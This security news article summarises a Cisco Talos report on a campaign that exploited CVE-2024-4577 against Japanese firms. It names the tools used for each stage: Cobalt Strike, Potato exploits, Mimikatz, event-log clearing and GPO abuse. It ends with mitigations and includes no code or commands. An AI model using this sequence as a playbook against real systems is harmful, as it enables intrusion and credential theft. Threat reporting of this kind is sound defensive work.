Attackers Targeting Japanese Firms with Cobalt Strike
Threat analysts have warned against a sophisticated cyber-intrusion campaign that predominantly targets organizations in Japan across the technology, telecommunications, entertainment, education and e-commerce sectors.
According to Cisco Talos, who discovered the campaign, the attackers exploited CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation on Windows, to gain an initial foothold.
Once access was obtained, the attackers executed PowerShell scripts to deploy Cobalt Strike reverse HTTP shellcode, ensuring persistent remote access. Post-exploitation activities involved privilege escalation, credential theft and lateral movement using plugins from the publicly available Cobalt Strike kit “TaoWu.”
Key Stages of the Attack
The attackers leveraged a publicly available Python exploit script, PHP-CGI_CVE-2024-4577_RCE.py, to test for vulnerabilities. If successful, they injected PowerShell commands into the victim’s machine, initiating a payload download from their command-and-control (C2) server.
The key stages of the attack include:
- Privilege escalation using JuicyPotato, RottenPotato and SweetPotato exploits
- Persistence mechanisms via registry modifications, scheduled tasks and system process creation
- Detection evasion by clearing Windows event logs using wevtutil commands
- Network reconnaissance with tools such as fscan.exe and Seatbelt.exe
- Credential theft via Mimikatz to dump NTLM hashes and plaintext passwords
The attackers utilized Ladon.exe to bypass User Account Control (UAC) and execute payloads stealthily. They also employed SharpTask.exe, SharpHide.exe and SharpStay.exe to manipulate registry keys and establish persistent services.
For lateral movement, they abused Group Policy Objects (GPOs) using SharpGPOAbuse.exe, scanning subnets for open ports and executing malicious scripts across compromised networks.
Misuse of Cloud-Based Adversarial Frameworks
The attackers leveraged containers hosted on Alibaba Cloud to deploy a pre-configured installer script, which facilitated the download of various offensive security tools. Among these tools is Blue-Lotus, a JavaScript webshell designed for cross-site scripting (XSS) and browser exploitation.
Additionally, they employed BeEF, a browser exploitation framework that allows for command execution through hooked web browsers.
Another tool in the attackers’ arsenal is Viper C2, a modular control framework that supports payload execution across multiple platforms.
While some tactics align with previously documented attacks by the You Dun (Dark Cloud Shield) hacker group, no definitive attribution has been made. Analysts noted similarities in Cobalt Strike usage, privilege escalation techniques and credential harvesting strategies.
Mitigation Strategies
Organizations should take the following steps to defend against similar attacks:
- Patch systems immediately to remediate CVE-2024-4577
- Restrict PowerShell execution using group policies
- Monitor logs for unauthorized registry modifications
- Deploy endpoint detection and response (EDR) solutions to detect Cobalt Strike activity
The discovery of this attack reinforces the growing trend of threat actors exploiting public-facing applications for initial access. Organizations must remain vigilant against evolving adversarial tactics.
